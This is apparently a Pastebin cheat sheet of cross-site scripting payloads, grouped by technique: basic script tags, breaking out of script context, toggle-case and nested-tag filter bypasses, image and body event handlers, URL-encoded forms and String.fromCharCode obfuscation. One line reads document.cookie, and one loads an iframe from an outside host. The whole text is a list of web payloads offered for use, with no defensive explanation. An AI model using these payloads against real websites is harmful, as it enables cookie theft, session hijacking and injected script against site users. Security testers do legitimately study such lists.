Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Basic XSS codes:
- ———————————-
- <script>alert(“XSS”)</script>
- <script>alert(“XSS”);</script>
- <script>alert(‘XSS’)</script>
- “><script>alert(“XSS”)</script>
- <script>alert(/XSS”)</script>
- <script>alert(/XSS/)</script>
- #When inside Script tag:
- </script><script>alert(1)</script>
- ‘; alert(1);
- ‘)alert(1);//
- #Bypassing with toggle case:
- <ScRiPt>alert(1)</sCriPt>
- <IMG SRC=jAVasCrIPt:alert(‘XSS’)>
- #XSS in Image and HTML tags:
- <IMG SRC=”javascript:alert(‘XSS’);”>
- <IMG SRC=javascript:alert("XSS")>
- <IMG SRC=javascript:alert(‘XSS’)>
- <img src=xss onerror=alert(1)>
- <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC=”jav ascript:alert(‘XSS’);”>
- <IMG SRC=”jav	ascript:alert(‘XSS’);”>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=javascript:alert('XSS')>
- <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
- <BODY ONLOAD=alert(‘XSS’)>
- <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
- <IMG SRC=”javascript:alert(‘XSS’)”
- <iframe src=http://ha.ckers.org/scriptlet.html <
- #Bypass the script tag filtering:
- <<SCRIPT>alert(“XSS”);//<</SCRIPT>
- %253cscript%253ealert(1)%253c/script%253e
- “><s”%2b”cript>alert(document.cookie)</script>
- foo<script>alert(1)</script>
- <scr<script>ipt>alert(1)</scr</script>ipt>
- #Using String.fromCharCode function:
- <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
- ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
